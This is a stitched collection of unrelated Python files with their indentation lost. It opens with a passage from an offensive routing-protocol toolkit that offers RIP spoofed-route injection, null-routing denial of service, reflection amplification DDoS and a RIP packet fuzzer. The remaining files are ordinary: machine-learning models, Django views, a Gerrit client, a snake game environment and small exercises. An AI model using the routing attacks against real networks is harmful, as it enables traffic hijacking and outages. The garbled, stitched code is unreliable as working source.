# Step 2: Fuzz on RIPAuth md5authdata structure's digestoffset.
for val in set(Fuzzer.get16bitFuzzes()):
ripauth = RIPAuth()
ripauth.authtype = 1
ripauth.digestoffset = val
ripauth.keyid = 0
ripauth.authdatalen = '\x01\x02\x03\x04\x05\x06\x07\x08'
ripauth.seqnum = 0
auths.add(ripauth)
# Step 3: Fuzz on RIPAuth md5authdata structure's keyid.
for val in set(Fuzzer.get8bitFuzzes()):
ripauth = RIPAuth()
ripauth.authtype = 1
ripauth.digestoffset = 0
ripauth.keyid = val
ripauth.authdatalen = '\x01\x02\x03\x04\x05\x06\x07\x08'
ripauth.seqnum = 0
auths.add(ripauth)
# Step 4: Fuzz on RIPAuth md5authdata structure's seqnum.
for val in set(Fuzzer.get8bitFuzzes()):
ripauth = RIPAuth()
ripauth.authtype = 1
ripauth.digestoffset = 0
ripauth.keyid = 0
ripauth.authdatalen = '\x01\x02\x03\x04\x05\x06\x07\x08'
ripauth.seqnum = val
auths.add(ripauth)
# Step 5: Fuzz on RIPAuth md5authdata structure's authdatalen.
for val in set(Fuzzer.getFuzzyStrings(maxLen = 16, allOfThem = False)):
ripauth = RIPAuth()
ripauth.authtype = 1
ripauth.digestoffset = 0
ripauth.keyid = 0
ripauth.authdatalen = val
ripauth.seqnum = 0
auths.add(ripauth)
return auths
def getHwAddr(ifname):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', ifname[:15]))
return ':'.join(['%02x' % ord(char) for char in info[18:24]])
def getIfaceIP(iface):
out = shell("ip addr show " + iface + " | grep 'inet ' | awk '{print $2}' | head -1 | cut -d/ -f1")
Logger.dbg('Interface: {} has IP: {}'.format(iface, out))
return out
def shell(cmd):
out = commands.getstatusoutput(cmd)[1]
Logger.dbg('shell("{}") returned:\n"{}"'.format(cmd, out))
return out
def selectDefaultInterface():
global config
commands = {
'ip' : "ip route show | grep default | awk '{print $5}' | head -1",
'ifconfig': "route -n | grep 0.0.0.0 | grep 'UG' | awk '{print $8}' | head -1",
}
for k, v in commands.items():
out = shell(v)
if len(out) > 0:
Logger.dbg('Default interface lookup command returned:\n{}'.format(out))
config['interface'] = out
return out
return ''
def parseOptions(argv):
global config
print('''
:: Routing Protocols Exploitation toolkit
Sends out various routing protocols management frames
Mariusz B. / mgeeky '19, <[email protected]>
v{}
'''.format(VERSION))
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options]')
parser.add_argument('-v', '--verbose', action='store_true', help='Display verbose output.')
parser.add_argument('-D', '--debug', action='store_true', help='Display debug output.')
parser.add_argument('-d', '--delay', type=float, default=1.0, help='Delay in seconds (float) between sending consecutive packets. Default: 1 second. Not applies to fuzzers.')
parser.add_argument('-t', '--attack', metavar='ATTACK', default='', help='Select attack to launch. One can use: "-t list" to list available attacks.')
parser.add_argument('-i', '--interface', metavar='DEV', default='', help='Select interface on which to operate.')
parser.add_argument('-s', '--spoof', help = 'IP address to be used as a spoofed/fake gateway, e.g. Attacker machine address. By default will try to figure out that address automatically.', default='')
auth = parser.add_argument_group('Routing Protocol Authentication', 'Specifies authentication data for Routing protocol to use')
auth.add_argument('--auth-type', help = 'Authentication type. Can be one of following: "simple", "md5authdata", "md5". Applies only to authentication-capable protocols, like RIPv2', default='')
auth.add_argument('--auth-data', help = 'Password / authentication data to pass in every packet. This field depends on the "--auth-type" used.', default='')
route = parser.add_argument_group('Spoofed Route injection', 'Specifies fake route details to inject')
route.add_argument('-a', '--network', help = 'IP address of network to announce, can be paired with netmask in CIDR notation. One can use "default" for 0.0.0.0')
route.add_argument('-b', '--netmask', help = 'Netmask to use (can be inferred from "--network". Default: /24', default='255.255.255.0')
route.add_argument('-c', '--nexthop', help = 'Spoofed next hop address. Default: 0.0.0.0.', default = '0.0.0.0')
route.add_argument('-m', '--metric', help = 'Metric to be used. The lower the greater priority it gets. Default: 10', type=int, default='10')
args = parser.parse_args()
if not 'attack' in args:
Logger.err('You must specify an attack to launch!')
return False
if args.attack == 'list':
print("Available attacks:")
for a in attacks:
print("\t{}. '{}' - {}".format(a['num'], a['name'], a['desc']))
sys.exit(0)
else:
att = args.attack
try:
att = int(att)
except: pass
for a in attacks:
if att == a['num'] or att == a['name']:
config['attack'] = a
break
if 'attack' not in config or not config['attack']:
Logger.err("Selected attack is not implemented or wrongly stated.")
parser.print_help()
return False
config['verbose'] = args.verbose
config['debug'] = args.debug
config['delay'] = args.delay
if args.interface != '': config['interface'] = args.interface
else: config['interface'] = selectDefaultInterface()
if args.network != '': config['network'] = args.network
if args.spoof != '': config['spoof'] = args.spoof
else: config['spoof'] = getIfaceIP(config['interface'])
Logger.info("Using {} as local/spoof IP address".format(config['spoof']))
if args.netmask != '': config['netmask'] = args.netmask
if args.nexthop != '': config['nexthop'] = args.nexthop
if args.metric != '': config['metric'] = args.metric
if args.auth_type != '': config['auth-type'] = args.auth_type
if args.auth_data != '': config['auth-data'] = args.auth_data
if config['auth-type'] != '':
if config['auth-data'] == '':
Logger.err("You must specify authentication data along with the --auth-type.")
return False
config['auth-type'] = args.auth_type
config['auth-data'] = args.auth_data
return args
def main(argv):
global attacks
attacks = (
{
'num': 0,
'name': 'sniffer',
'desc': '(NOT YET IMPLEMENTED) Sniffer hunting for authentication strings.',
'object': Sniffer,
'params': {
}
},
{
'num': 1,
'name': 'ripv1-route',
'desc': 'RIP Spoofed Route announcement',
'object': RIPv1v2Attacks,
'params': {
'version' : 1,
}
},
{
'num': 2,
'name': 'ripv1-dos',
'desc': 'RIPv1 Denial of Service by Null-routing',
'object': RIPv1v2Attacks,
'params': {
'version' : 1,
'delay' : 1,
'network': '0.0.0.0',
'metric': 1
}
},
{
'num': 3,
'name': 'ripv1-ampl',
'desc': 'RIPv1 Reflection Amplification DDoS',
'object': RIPv1v2Attacks,
'params': {
'version' : 1,
'delay' : 0.5,
'network': '0.0.0.0',
'netmask': '0.0.0.0',
'nexthop': '0.0.0.1',
'metric': 1,
'AF': 0, # Unspecified
'rip_cmd': 1, # Request
}
},
{
'num': 4,
'name': 'ripv2-route',
'desc': 'RIPv2 Spoofed Route announcement',
'object': RIPv1v2Attacks,
'params': {
'version' : 2,
}
},
{
'num': 5,
'name': 'ripv2-dos',
'desc': 'RIPv2 Denial of Service by Null-routing',
'object': RIPv1v2Attacks,
'params': {
'version' : 2,
'delay' : 1,
'network': '0.0.0.0',
'netmask': '0.0.0.0',
'nexthop': '0.0.0.1',
'metric': 1
}
},
{
'num': 6,
'name': 'rip-fuzzer',
'desc': 'RIP/RIPv2 packets fuzzer',
'object': RIPFuzzer,
'params': {
}
},
)
opts = parseOptions(argv)
if not opts:
Logger.err('Options parsing failed.')
return False
if os.getuid() != 0:
Logger.err('This program must be run as root.')
return False
load_contrib('ospf')
load_contrib('eigrp')
load_contrib('bgp')
attack = config['attack']['object']()
print("[+] Launching attack: {}".format(config['attack']['desc']))
if attack.injectOptions(config['attack']['params'], config):
attack.launch()
else:
Logger.err("Module prerequisite options were not passed correctly.")
if __name__ == '__main__':
main(sys.argv)
|
py | 1a4fb501b9eed53c13f1ec93f89d8f9309f80972 | import torch
import torch.nn as nn
from torch.autograd import Variable
class RNN(nn.Module):
def __init__(self, input_size, hidden_size, output_size, n_layers=1):
super(RNN, self).__init__()
self.input_size = input_size
self.hidden_size = hidden_size
self.output_size = output_size
self.n_layers = n_layers
self.encoder = nn.Embedding(input_size, hidden_size)
self.gru = nn.GRU(hidden_size, hidden_size, n_layers)
self.decoder = nn.Linear(hidden_size, output_size)
def forward(self, input, hidden):
input = self.encoder(input.view(1, -1))
output, hidden = self.gru(input.view(1, 1, -1), hidden)
output = self.decoder(output.view(1, -1))
return output, hidden
def init_hidden(self):
return Variable(torch.zeros(self.n_layers, 1, self.hidden_size))
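# A minimal usage sketch (the vocabulary size of 100 below is a made-up example); the
# model consumes one token index at a time and threads the GRU hidden state through.
if __name__ == '__main__':
    rnn = RNN(input_size=100, hidden_size=64, output_size=100)
    hidden = rnn.init_hidden()
    token = Variable(torch.LongTensor([5]))  # a single, hypothetical token index
    output, hidden = rnn(token, hidden)
    print(output.size())  # torch.Size([1, 100])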
|
py | 1a4fb52806094dbbf1f0f6a75d4b679e9fffc5e3 | import sys
A = sys.stdin.readline()[:-1]
stack = []
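# Bracket-value rules implemented below: "()" is worth 2 and "[]" is worth 3,
# concatenation adds and nesting multiplies (e.g. "([])" -> 2 * 3 = 6).  Partial sums
# accumulate in temp until the matching opener is popped; any mismatch prints 0.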
for ch in A:
if ch == ')':
temp = 0
while stack:
val = stack.pop()
if val == '(':
if temp == 0:
stack.append(2)
else:
stack.append(2 * temp)
break
elif val == '[':
print(0)
exit(0)
else:
temp += int(val)
elif ch == ']':
temp = 0
while stack:
val = stack.pop()
if val == '[':
if temp == 0:
stack.append(3)
else:
stack.append(3 * temp)
break
elif val == '(':
print(0)
exit(0)
else:
temp += val
else:
stack.append(ch)
if not '(' in stack and not '[' in stack:
print(sum(stack))
else:
print(0)
|
py | 1a4fb556da92d389c93bab7d62247a140ba17fcc | import json
from flask import abort, Response
from api.defect_prediction import DefectPredictor
import random # TODO remove after imiplementing classify()
def classify(script):
"""
This function responds to a request for /api/classification/classify (POST)
with the result of a classification on the passed script
:return: a boolean indicating whether the script has been detected has defective (true) or not )(false).
"""
dp = DefectPredictor(script)
if not dp.isValid:
abort(Response({'Not a valid yaml file.'}, 400))
# Check empty file (note: empty files are valid yaml files)
if dp.isEmpty:
abort(Response({'Empty file.'}, 400))
is_defective = dp.classify()
result = {
"defective": is_defective,
"metrics": dp.ansible_metrics
}
return result, 200 |
py | 1a4fb55d57cf94dcda50232c77558424d70e980c | #
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""A Mesos-customized entry point to the thermos_observer webserver."""
import time
from twitter.common import app
from twitter.common.exceptions import ExceptionalThread
from twitter.common.log.options import LogOptions
from twitter.common.quantity import Amount, Time
from apache.aurora.executor.common.path_detector import MesosPathDetector
from apache.thermos.observer.http.configure import configure_server
from apache.thermos.observer.task_observer import TaskObserver
app.add_option(
'--mesos-root',
dest='mesos_root',
type='string',
default=MesosPathDetector.DEFAULT_MESOS_ROOT,
help='The mesos root directory to search for Thermos executor sandboxes [default: %default]')
app.add_option(
'--port',
dest='port',
type='int',
default=1338,
help='The port on which the observer should listen.')
app.add_option(
'--polling_interval_secs',
dest='polling_interval_secs',
type='int',
default=int(TaskObserver.POLLING_INTERVAL.as_(Time.SECONDS)),
help='The number of seconds between observer refresh attempts.')
# Allow an interruptible sleep so that ^C works.
def sleep_forever():
while True:
time.sleep(1)
def initialize(options):
path_detector = MesosPathDetector(options.mesos_root)
polling_interval = Amount(options.polling_interval_secs, Time.SECONDS)
return TaskObserver(path_detector, interval=polling_interval)
def main(_, options):
observer = initialize(options)
observer.start()
root_server = configure_server(observer)
thread = ExceptionalThread(target=lambda: root_server.run('0.0.0.0', options.port, 'cherrypy'))
thread.daemon = True
thread.start()
sleep_forever()
LogOptions.set_stderr_log_level('google:INFO')
app.main()
|
py | 1a4fb5baa63283d21999247305195c72aa5462b9 | #
# Copyright (c) 2010 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
def create_password_login_command(user, host):
"""
Create an ssh command line.
"""
cmd = 'ssh'
cmd += ' -oPreferredAuthentications=password'
cmd += ' -oStrictHostKeyChecking=no'
cmd += ' %s@%s' % (user, host)
return cmd
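# A small usage sketch with a hypothetical user/host pair:
#
#   print(create_password_login_command('root', '192.0.2.10'))
#   # ssh -oPreferredAuthentications=password -oStrictHostKeyChecking=no [email protected]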
|
py | 1a4fb61060ba7b7c5a7e67c154fd37291a36333e | #!/usr/bin/python3
def safe_print_list(my_list=[], x=0):
i = 0
for j in range(0, x):
try:
print(my_list[j], end='')
i = i + 1
except:
break
print()
return i
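# Usage sketch: safe_print_list([1, 2, 3, 4], 3) prints "123" followed by a newline and
# returns 3; if x exceeds the list length, printing stops early and the count of
# elements actually printed is returned.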
|
py | 1a4fb645aeb50d7520afc12cbaeb5bac8a9f9d2c | from prefect import Flow
from prefect.executors import LocalExecutor
from getLastProcess import GetLastProcess
with Flow("Camara_Bot_Flow") as flow:
get_last_process_task = GetLastProcess()
flow.add_task(get_last_process_task)
result1 = get_last_process_task.run()
state = flow.run()
assert state.is_successful()
flow.register(project_name="second")
|
py | 1a4fb76f9790faec4a2d65002c4ebd6e171a9b75 | #!/usr/bin/env python
# -*- coding:utf-8 -*-
# @Author: Jialiang Shi
from gerrit.utils.models import BaseModel
class Message(BaseModel):
def __init__(self, **kwargs):
super(Message, self).__init__(**kwargs)
self.attributes = [
"id",
"_revision_number",
"message",
"date",
"author",
"real_author",
"tag",
"change",
"gerrit",
]
def delete(self, input_=None):
"""
Deletes a change message.
Note that only users with the Administrate Server global capability are permitted to delete a change message.
.. code-block:: python
input_ = {
"reason": "spam"
}
change = gerrit.changes.get('myProject~stable~I10394472cbd17dd12454f229e4f6de00b143a444')
message = change.messages.get("babf4c5dd53d7a11080696efa78830d0a07762e6")
result = message.delete(input_)
# or
result = message.delete()
:param input_: the DeleteChangeMessageInput entity,
https://gerrit-review.googlesource.com/Documentation/rest-api-changes.html#delete-change-message-input
:return:
"""
if input_ is None:
endpoint = "/changes/%s/messages/%s" % (self.change, self.id)
self.gerrit.requester.delete(self.gerrit.get_endpoint_url(endpoint))
else:
endpoint = "/changes/%s/messages/%s/delete" % (self.change, self.id)
base_url = self.gerrit.get_endpoint_url(endpoint)
response = self.gerrit.requester.post(
base_url, json=input_, headers=self.gerrit.default_headers
)
result = self.gerrit.decode_response(response)
change = self.gerrit.changes.get(self.change)
return change.messages.get(result.get("id"))
class Messages(object):
def __init__(self, change, gerrit):
self.change = change
self.gerrit = gerrit
def list(self):
"""
Lists all the messages of a change including detailed account information.
:return:
"""
endpoint = "/changes/%s/messages" % self.change
response = self.gerrit.requester.get(self.gerrit.get_endpoint_url(endpoint))
result = self.gerrit.decode_response(response)
return Message.parse_list(result, change=self.change, gerrit=self.gerrit)
def get(self, id_):
"""
Retrieves a change message including detailed account information.
:param id_: change message id
:return:
"""
endpoint = "/changes/%s/messages/%s" % (self.change, id_)
response = self.gerrit.requester.get(self.gerrit.get_endpoint_url(endpoint))
result = self.gerrit.decode_response(response)
return Message.parse(result, change=self.change, gerrit=self.gerrit)
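# A short usage sketch (the change id is the illustrative one from the docstrings above;
# `gerrit` is assumed to be an authenticated client object):
#
#   change = gerrit.changes.get('myProject~stable~I10394472cbd17dd12454f229e4f6de00b143a444')
#   for message in change.messages.list():
#       print(message.id, message.date, message.message)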
|
py | 1a4fb7a60a704561cbf2ed006c567da3a6b04c1b | from __future__ import absolute_import, print_function
import typing
import gym
from core import Action
from graphic import CursesSnake
class SnakeEnv(gym.Env):
"""
0 -> go straight
1 -> turn left
2 -> turn right
"""
action_space = [0, 1, 2]
def __init__(self, shape: [typing.List[int], typing.Tuple[int, int]] = (4, 4)):
self.shape = shape
self.curses_snake: CursesSnake = ...
action_space = Action
up, down, left, right, none = (action_space.UP, action_space.DOWN, action_space.LEFT,
action_space.RIGHT, action_space.NONE)
self.direction_env_action_to_game_action: typing.Dict[int, typing.List[int]] = {
up: [none, left, right],
down: [none, right, left],
left: [none, down, up],
right: [none, up, down]
}
self.reset()
def reset(self) -> typing.List[typing.List[int]]:
self.curses_snake = CursesSnake(self.shape)
return self.curses_snake.snake.game_board.data
def render(self, mode='human') -> None:
self.curses_snake.render()
def step(self, action: int) -> (typing.List[typing.List[int]], float, bool, typing.Any):
return self.curses_snake.snake.step(
self.direction_env_action_to_game_action[
self.curses_snake.snake.snake.direction][action])
def close(self):
self.curses_snake.close()
def seed(self, seed=None):
pass
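# A minimal interaction sketch: the board comes back as a plain list of lists and the
# actions are 0/1/2 for straight/left/right as documented above.  CursesSnake draws to
# the terminal, so this is only meaningful in an interactive session.
if __name__ == '__main__':
    env = SnakeEnv((8, 8))
    board = env.reset()
    board, reward, done, info = env.step(0)  # keep going straight
    env.close()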
|
py | 1a4fb9961ce2f6d53f2cb8e76b696f1dbc4cf05e | # Create your views here.
from django import forms, http
from django.http import Http404, HttpResponse
from django.views.generic import ListView, View, CreateView, FormView, UpdateView
from django.views.generic.base import TemplateView
from django.http import HttpResponseRedirect
from core.views import AuthorizedOrganizationMixin, AuthorizedOrganizationEditMixin, ConfirmationObjectView
from django.utils import simplejson
from core.views import PathMixin
from django.core.urlresolvers import reverse
from braces.views import LoginRequiredMixin
from django.template.defaultfilters import slugify
from experiment.forms import ExperimentManualForm, ExperimentAddForm
from protocols.models import Protocol, Step, Action, Thermocycle, Machine, Component
from organization.models import Organization
from schedule.models import Calendar
from experiment.models import Experiment
from protocols.utils import VERB_CHOICES, VERB_FORM_DICT
from workflow.models import Workflow
class ExperimentSetupMixin(PathMixin):
pathEnd = {}
titleMarks = {'suffix':"",'prefix':""}
def get_context_data(self, **kwargs):
context = super(ExperimentSetupMixin, self).get_context_data(**kwargs)
experiment_slug = self.kwargs.get('experiment_slug', None)
prefix = self.titleMarks['prefix']
suffix = self.titleMarks['suffix']
title = ""
if experiment_slug:
context['experiment'] = self.request.user.experiment_set.get(slug=experiment_slug)
context['organization'] = context['experiment'].owner
context['workflow'] = context['experiment'].workflow
else:
owner_slug = self.kwargs.get('owner_slug', None)
if owner_slug:
context['organization'] = self.request.user.organization_set.get(slug=owner_slug)
if 'organization' in context:
context['paths'].append({'name':context['organization'].name, 'url':context['organization'].get_absolute_url()})
title = context['organization'].name
if 'experiment' in context:
context['paths'].append({'name':context['experiment'].name, 'url':context['experiment'].get_absolute_url()})
prefix = title
title = context['experiment'].name
if self.pathEnd:
context['paths'].append( self.pathEnd )
suffix = self.pathEnd['name']
else:
del(context['paths'][-1]['url'])
if title:
context['titleBlock'] = {'prefix':prefix, 'title':title, 'suffix':suffix}
return context
class ExperimentDetailView(ExperimentSetupMixin, LoginRequiredMixin, TemplateView):
model = Experiment
slug_url_kwarg = "experiment_slug"
template_name = "experiment/experiment_detail.html"
def get_context_data(self, **kwargs):
context = super(ExperimentDetailView, self).get_context_data(**kwargs)
return context
class ExperimentUpdateView(ExperimentSetupMixin, LoginRequiredMixin, FormView):
model = Experiment
form_class = ExperimentManualForm
slug_url_kwarg = "owner_slug"
template_name = "experiment/experiment_form.html"
pathEnd = {'name':'Edit'}
def form_valid(self, form):
slug = self.kwargs.get(self.slug_url_kwarg, None)
org = self.request.user.organization_set.get(slug=slug)
slug = self.kwargs.get('experiment_slug', None)
exp = self.request.user.experiment_set.get(slug=slug)
oldWorkflow = exp.workflow
oldName = exp.name
exp.workflow = self.request.user.workflow_set.get(pk=form.cleaned_data['workflows'][0])
exp.name = form.cleaned_data['name']
exp.slug = slugify(exp.name)
exp.save()
if oldWorkflow != exp.workflow:
workflowChanged = True
else:
workflowChanged = False
if oldName != exp.name:
nameChanged = True
else:
nameChanged = False
for cal in self.request.user.calendar_set.all():
if exp.pk in cal.data['meta']['experiments']:
cal.updateCalendar(exp, workflowChanged, nameChanged)
return HttpResponseRedirect(exp.get_absolute_url())
def get_form(self, form_class):
form = form_class(**self.get_form_kwargs())
try:
exp = self.request.user.experiment_set.get(slug=self.kwargs['experiment_slug'])
org = self.request.user.organization_set.get(slug=self.kwargs['owner_slug'])
workflows = org.workflow_set.all()
workflows = [w for w in workflows if w.user==self.request.user and w!=exp.workflow]
workflows.insert(0,exp.workflow)
form.initial['name'] = exp.name
form.fields['workflows'] = forms.ChoiceField(
label="Workflows",
choices=((x.pk,x) for x in workflows))
return form
except:
# try:
# org = self.request.user.organization_set.get(slug=self.kwargs['owner_slug'])
# workflows = org.workflow_set.all()
# workflows = [w for w in workflows if w.user==self.request.user]
# form.fields['workflows'] = forms.ChoiceField(
# label="Workflows",
# choices=((x.pk,x) for x in workflows))
# except:
# raise Http404
# return form
raise Http404
class ExperimentAddView(ExperimentSetupMixin, LoginRequiredMixin, FormView):
model = Experiment
form_class = ExperimentAddForm
slug_url_kwarg = "experiment_slug"
template_name = "experiment/experiment_add.html"
pathEnd = {'name':'Add to Calendar'}
def form_valid(self, form):
try:
calendarPKs = [x[0] for x in form.cleaned_data['calendars']]
calendars = self.request.user.calendar_set.filter(pk__in=calendarPKs)
exp = self.request.user.experiment_set.get(slug=self.kwargs['experiment_slug'])
for cal in calendars:
cal.addExperiment(exp)
return HttpResponseRedirect(calendars[0].get_absolute_url())
except:
raise Http404
def get_form(self, form_class):
form = form_class(**self.get_form_kwargs())
try:
calendars = self.request.user.calendar_set.all()
form.fields['calendars'] = forms.MultipleChoiceField(
label="Calendars",
widget=forms.CheckboxSelectMultiple,
choices=((x.pk,x) for x in calendars))
except:
raise Http404
return form
# def post(self, request, *args, **kwargs):
# '''This is done to handle the two forms'''
# form = self.form_class(request.POST)
# if form.is_valid():
# return self.form_valid(form)
# else:
# return self.form_invalid(form)
# def form_invalid(self, form):
# return self.render_to_response(self.get_context_data(form=form))
class ExperimentCreateView(ExperimentSetupMixin, LoginRequiredMixin, FormView):
model = Experiment
form_class = ExperimentManualForm
slug_url_kwarg = "owner_slug"
template_name = "experiment/experiment_form.html"
pathEnd = {'name':'New Experiment'}
def get_success_url(self):
return self.get_absolute_url()
def form_valid(self, form):
slug = self.kwargs.get(self.slug_url_kwarg, None)
org = self.request.user.organization_set.get(slug=slug)
e = Experiment()
e.user = self.request.user
e.workflow = self.request.user.workflow_set.get(pk=form.cleaned_data['workflows'][0])
e.data = {'meta':{}}
e.name = form.cleaned_data['name']
e.slug = slugify(form.cleaned_data['name'])
e.owner = org
e.save()
return HttpResponseRedirect(e.get_absolute_url())
def get_form(self, form_class):
form = form_class(**self.get_form_kwargs())
try:
org = self.request.user.organization_set.get(slug=self.kwargs['owner_slug'])
workflows = org.workflow_set.all()
workflows = [w for w in workflows if w.user==self.request.user]
form.fields['workflows'] = forms.ChoiceField(
label="Workflows",
choices=((x.pk,x) for x in workflows))
except:
raise Http404
return form
|
py | 1a4fb9b372c97bd8ceda4c046611ed934747a2ae | import sys
import os
import cPickle as pickle
from cfr.logger import Logger as Log
Log.VERBOSE = True
import cfr.evaluation as evaluation
from cfr.plotting import *
def sort_by_config(results, configs, key):
vals = np.array([cfg[key] for cfg in configs])
I_vals = np.argsort(vals)
for k in results['train'].keys():
results['train'][k] = results['train'][k][I_vals,]
results['valid'][k] = results['valid'][k][I_vals,]
if k in results['test']:
results['test'][k] = results['test'][k][I_vals,]
configs_sorted = []
for i in I_vals:
configs_sorted.append(configs[i])
return results, configs_sorted
def load_config(config_file):
with open(config_file, 'r') as f:
cfg = [l.split('=') for l in f.read().split('\n') if '=' in l]
cfg = dict([(kv[0], eval(kv[1])) for kv in cfg])
return cfg
def evaluate(config_file, overwrite=False, filters=None, embeddings=False, rname=None, ps=None):
if not os.path.isfile(config_file):
raise Exception('Could not find config file at path: %s' % config_file)
cfg = load_config(config_file)
output_dir = 'cfrnet/results/'+ps
if not os.path.isdir(output_dir):
raise Exception('Could not find output at path: %s' % output_dir)
data_train = cfg['datadir']+'/'+ps + '_train_exp.csv'
data_test = cfg['datadir']+'/'+ps + '_test_exp.csv'
binary = False
if cfg['loss'] == 'log':
binary = True
# Evaluate results
eval_path = '%s/evaluation.npz' % output_dir
if overwrite or (not os.path.isfile(eval_path)):
eval_results, configs = evaluation.evaluate(output_dir,
data_path_train=data_train,
data_path_test=data_test,
binary=binary, embeddings=embeddings, rname=rname)
# Save evaluation
pickle.dump((eval_results, configs), open(eval_path, "wb"))
else:
if Log.VERBOSE:
print 'Loading evaluation results from %s...' % eval_path
# Load evaluation
eval_results, configs = pickle.load(open(eval_path, "rb"))
# Sort by alpha
#eval_results, configs = sort_by_config(eval_results, configs, 'p_alpha')
# Print evaluation results
if binary:
plot_evaluation_bin(eval_results, configs, output_dir, data_train, data_test, filters)
else:
plot_evaluation_cont(eval_results, configs, output_dir, data_train, data_test, filters)
# Plot evaluation
if configs[0]['loss'] == 'log':
plot_cfr_evaluation_bin(eval_results, configs, output_dir)
else:
plot_cfr_evaluation_cont(eval_results, configs, output_dir)
if __name__ == "__main__":
if len(sys.argv) < 2:
print 'Usage: python evaluate.py <config_file> <overwrite (default 0)> <filters (optional)>'
else:
config_file = sys.argv[1]
ps = sys.argv[5]
overwrite = False
if len(sys.argv)>2 and sys.argv[2] == '1':
overwrite = True
filters = None
#if len(sys.argv)>3:
# filters = eval(sys.argv[3])
embeddings = False
if len(sys.argv)>3 and sys.argv[3] == '1':
embeddings = True
rname = None
if len(sys.argv)>4:
rname = sys.argv[4]
evaluate(config_file, overwrite, filters=filters, embeddings=embeddings, rname=rname, ps=ps)
|
py | 1a4fba35f43641e778ebbe4fee6bc5c3f155b165 | # https://www.acmicpc.net/problem/17135
def dfs(cur, depth):
if depth == 3:
# print(case)
check()
return
if cur == M:
return
dfs(cur + 1, depth)
case.append(cur)
dfs(cur + 1, depth + 1)
case.pop()
def check():
cnt = 0
for _ in range(N):
cnt += count_dead()
down()
for row, line in enumerate(temp):
graph[row] = line[:]
res.append(cnt)
def down():
for idx in range(N - 1, 0, -1):
graph[idx] = graph[idx - 1]
graph[0] = [0 for _ in range(M)]
def count_dead():
dead = [0 for _ in range(M)]
kill = list()
for arrow in case:
candi = list()
for row in range(N):
for col in range(M):
if graph[row][col] == 0:
continue
dist = abs(col - arrow) + abs(row - N)
if dist <= D:
candi.append((dist, col, row))
if candi:
candi = sorted(candi)
dead[candi[0][1]] = 1
kill.append(candi[0])
for k in kill:
graph[k[2]][k[1]] = 0
return sum(dead)
if __name__ == '__main__':
input = __import__('sys').stdin.readline
N, M, D = map(int,input().split())
graph = [list(map(int,input().split())) for _ in range(N)]
temp = [[] for _ in range(N)]
for row in range(N):
temp[row] = graph[row][:]
case = list()
res = list()
dfs(0, 0)
print(max(res)) |
py | 1a4fbb93ecee67a4019e435604bb47909583d90d | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
# Export this package's modules as members:
from ._enums import *
from .function import *
from .get_function import *
from .get_input import *
from .get_output import *
from .get_streaming_job import *
from .input import *
from .output import *
from .streaming_job import *
from ._inputs import *
from . import outputs
def _register_module():
import pulumi
from ... import _utilities
class Module(pulumi.runtime.ResourceModule):
_version = _utilities.get_semver_version()
def version(self):
return Module._version
def construct(self, name: str, typ: str, urn: str) -> pulumi.Resource:
if typ == "azure-native:streamanalytics/v20160301:Function":
return Function(name, pulumi.ResourceOptions(urn=urn))
elif typ == "azure-native:streamanalytics/v20160301:Input":
return Input(name, pulumi.ResourceOptions(urn=urn))
elif typ == "azure-native:streamanalytics/v20160301:Output":
return Output(name, pulumi.ResourceOptions(urn=urn))
elif typ == "azure-native:streamanalytics/v20160301:StreamingJob":
return StreamingJob(name, pulumi.ResourceOptions(urn=urn))
else:
raise Exception(f"unknown resource type {typ}")
_module_instance = Module()
pulumi.runtime.register_resource_module("azure-native", "streamanalytics/v20160301", _module_instance)
_register_module()
|
py | 1a4fbc882097aee7526a8fedf4c1a80ac8763e1b | import numpy as np
import matplotlib.pyplot as plt
from PIL import Image
from scipy.misc import imresize
from operator import itemgetter
import cv2
import pdb
# actions imshow convenience function
def actions_imshow(img,im_size):
plt.imshow(img.reshape([im_size,im_size,3]))
plt.axis('off')
# load Stanford-40 Actions dataset
def load_actions(path, inp_size):
# read filenames and labels
fid = open(path+"images.txt","r")
img_names = fid.read().splitlines()
fid.close()
fid = open(path+"labels.txt","r")
lbl_names = fid.read().splitlines()
fid.close()
fid = open(path+"splits.txt","r")
spl_names = fid.read().splitlines()
fid.close()
# parse splits
splits = []
for m in xrange(len(spl_names)):
splits.append(int(spl_names[m]))
# parse labels
trn_lbl = []
val_lbl = []
tst_lbl = []
for m in xrange(len(lbl_names)):
if splits[m]==3:
tst_lbl.append(int(lbl_names[m])-1)
else:
if splits[m]==2:
val_lbl.append(int(lbl_names[m])-1)
else:
trn_lbl.append(int(lbl_names[m])-1)
# parse images
trn_img = []
val_img = []
tst_img = []
for m in xrange(len(img_names)):
# read the image
data = cv2.imread(path+"JPEGImages/"+img_names[m])
#data = np.asarray(data)
if len(data.shape)==2:
data = np.repeat(data[:,:, np.newaxis], 3, axis=2)
data = imresize(data,(inp_size, inp_size, 3))
#pdb.set_trace()
# add it to the corresponding split
if splits[m]==3:
tst_img.append(data)
else:
if splits[m]==2:
val_img.append(data)
else:
trn_img.append(data)
return trn_img, val_img, tst_img, trn_lbl, val_lbl, tst_lbl
# return a new actions dataset
def disjoint_actions(actions,nums):
pos_trn = []
for i in range(len(nums)):
tmp = np.where(np.asarray(actions[3]) == nums[i])[0]
pos_trn = np.hstack((pos_trn,tmp))
pos_trn = np.asarray(pos_trn).astype(int)
np.random.shuffle(pos_trn)
pos_tst = []
for i in range(len(nums)):
tmp = np.where(np.asarray(actions[5]) == nums[i])[0]
pos_tst = np.hstack((pos_tst,tmp))
pos_tst = np.asarray(pos_tst).astype(int)
np.random.shuffle(pos_tst)
trn_img = itemgetter(*pos_trn)(actions[0])
val_img = actions[1]
